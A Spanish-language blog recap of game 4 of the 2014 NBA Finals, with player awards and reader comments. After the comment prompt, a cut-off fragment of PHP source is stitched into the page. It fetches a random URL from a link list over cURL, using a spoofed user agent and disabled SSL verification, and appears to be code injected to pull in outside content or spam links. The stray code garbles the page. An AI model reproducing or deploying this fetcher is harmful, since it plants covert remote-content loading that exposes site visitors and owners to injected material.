La Crónica: A un paso de la gloria

13 de June de 2014 por txusma

Tim Duncan, Kawhi Leonard, Boris Diaw, Tony Parker… Ahora mismo no me viene a la memoria ningún equipo de ninguna época que tras el 4º partido de las finales pudiera presentar hasta 4 candidatos al MVP. Creo que este hecho resume perfectamente lo que son estos Spurs.

Por primera vez esta temporada los Heat perdieron dos partidos consecutivos y lo han hecho por más de 19 puntos cada uno. Pero lo más preocupante ha sido la imagen de “quiero y no puedo” que han dejado esta madrugada. Los chicos de Spoelstra, tal vez faltos de fuerzas o de motivación, no han podido contrarestar en ningún momento el juego rápido y efectivo de los Spurs, ese que involucra a todos los jugadores de la plantilla y les hace sentir importantes. Jugadores que en otros equipos serían retales Greg Popovich los convierte en puntales sobre el que puede llegar a girar toda la estrategia de su equipo a pesar de no apellidarse Duncan, Parker o Ginobili.

Al final de la 1ª parte los tejanos ya dominaban claramente el partido y en el tercer cuarto lo acabaron de rematar. Seguramente se esperaban una salida en tromba de los locales tras el descanso pero el único que apareció con toda su energía fue Lebron James, el resto se quedó en el vestuario lamiéndose las heridas o acariciando los 2 anillos conseguidos o vete tú a saber. No creo que tras lo visto anoche nadie apueste por que los Heat ganen 3 partidos consecutivos. Seguro que más gente apostaría por el desmembramiento de un Big Three que esta temporada ha empezado a oler a hastío.

De todas maneras, pase lo que pase a partir de ahora (que Duncan y los Spurs se lleven el anillo o que los Heat protagonizen una remontada monumental) el momento será histórico. Disfrutemos. 

PREMIOS

MVP: 2ª exhibición consecutiva de Kawhi Leonard. No solo completó un boxscore súper completo (20 puntos, 14 rebotes, 3 robos y 4 tapones) sinó que ahogó, desquició e hizo desaparecer a todo jugador de los Heat al que tuvo el gusto de defender.

Sorpresa: Lo hemos comentado antes en la crónica y lo repetimos ahora: el francés Boris Diaw podría llevarse el MVP de las finales y no nos sorprendería. Cuando está en pista el juego fluye a través suyo con toda naturalidad. Sus 8 puntos, 9 rebotes y sobretodo las 9 asistencias de ayer son una prueba de ello.

Decepción: Chris Bosh y sobretodo Dwyane Wade desertaron cuando más los necesitaba su equipo. El primero se quedó en 12 puntos y 4 rebotes, en la línea de lo que vienen siendo sus playoffs. Wade estuvo aún peor, se quedó en 10 puntos tras anotar solo 3 de 13 intentos de canasta.

Esfuerzo en vano: Lebron James fue el único jugador de Miami que plantó batalla pero sus 28 puntos y 8 rebotes resultaron totalmente insuficientes.

Imágenes | AP Photos / Getty Images

Comenta

9 comentarios a esta entrada

  1. rumbero dice:
    #1

    Dos exhibiciones de los Spurs en Miami cuando venían con 1-1 y bastantes dudas. La sublimación de su juego en el momento oportuno. Yo me quito el sombrero una vez más. Y me alegro especialmente por Kawhi, al que seguro se le ha venido muchas veces a la cabeza ese tiro libre que falló el año pasado, y que se ha marcado dos auténticos partidazos ante Lebron. Si ayer hasta reía en la entrevista post partido…

      Citar

  2. Lucho dice:
    #2

    Es increible que lo que era una serie tan pareja se ha transformado en una mono exibicion. Fantasticos los Spurs en los Juegos 3 y 4, derecho a los mejores partidos jugados por un equipo en la historia de la NBA creo

    El MVP hasta ahora para mi es para Leonard, seguido de Diaw. Y veo a Ginobili como minimo al mismo nivel que Parker o el gigante Timmy-D en esa carrera

      Citar

  3. GreenPride dice:
    #3

    ¿Se nos acaban las Finales? Decepcionante partido de los Heat que deja el título prácticamente en manos de los Spurs salvo un milagro en el que si vemos la segunda parte parece no creer nadie, especialmente los propios jugadores de los Heat.
    Un LeBron impotente nadó en un tercer cuarto en el que metio 19 puntos con 7 de 7 tiros de campo (3 triples) para ver como sus compañeros hacían en ese tiempo 2 puntos con 1 de 9 en tiros y la diferencia seguia igual que al descanso. Impotencia que se tradujo en bajada de brazos en un último periodo en el que no anotó y el resto de los jugadores de Miami dejaron pasar el tiempo bloqueados mentalmente ante la exhibición de los texanos.
    Por los Spurs enorme juego de equipo en ataque y sobre todo esta vez en defensa con ayudas llegando a cada penetración e impidiendo tiros abiertos y impresionante Kawhi en estos dos partidos de Miami.
    Todo preparado en El Alamo para celebrar el 5º anillo de TD….

      Citar

  4. Esteban dice:
    #4

    que le pasa a wade? frente a los Pacers era una maquina y ahora es decepcionante

    por alli esta la clave

      Citar

  5. Lucho dice:
    #5

    Y Bosh esta entrando poco en juego creo. Deberian involucrarlo mas

      Citar

  6. Ruxixon dice:
    #6

    A mí el lenguaje corporal de LeBron me deja dudas,no sé si estará tocado o es que definitivamente en ese vestuario se han rendido tras la paliza del 3er partido.Desde luego entre su estadística de hoy y el resultado del partido parece más de lo segundo,por la actitud del inicio y porque el resultado se ha vuelto a repetir: San Antonio ha humillado 2 noches consecutivas a Miami en el American Airlines.Absolutamente incontestable su dominio y con el recuerdo del triple de Allen,convencido de que el lunes no darán lugar a la machada,y habrá un nuevo y merecido campeón,para alegría de los puristas y no tan puristas a los que le guste este juego.Es para enseñarlo en las categorías de formación.

    En Miami bochornosas finales de Wade y Chalmers.El primero está quedando retratado por su falta de actitud.Menos “hero ball” y más a bajar el culo en defensa.Y luego lo de siempre,ese paso atrás en su rendimiento en pos de que Miami creciera al son de LeBron está muy bien y ha dado frutos,pero también podemos sacar el punto crítico y atizarle diciendo que se vive muy bien a su sombra.Y lo de Chalmers….dan ganas de firmale un nuevo contrato y amnistiarle acto seguido,la pena es que se lo seguiría “llevando”.Ahora mismo los Heat están “clevelandanizados” y espero que LeBron opte por cambiar de destino,desde luego mucho antes que ese posible “Big 4” con Melo de nuevo integrante,rumor de las últimas 24 horas.

      Citar

  7. Ruxixon dice:
    #7

    La defensa de Wade en las finales,antológico

      Citar

  8. Jose Luis dice:
    #8

    dios mio wade, lo del 3:19 es increíble…

      Citar

  9. Blade Petrovic dice:
    #9

    Leonard se convierte en el tercer jugador que es MVP sin haber sido All-Star, los otros dos Billups y Maxwell

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>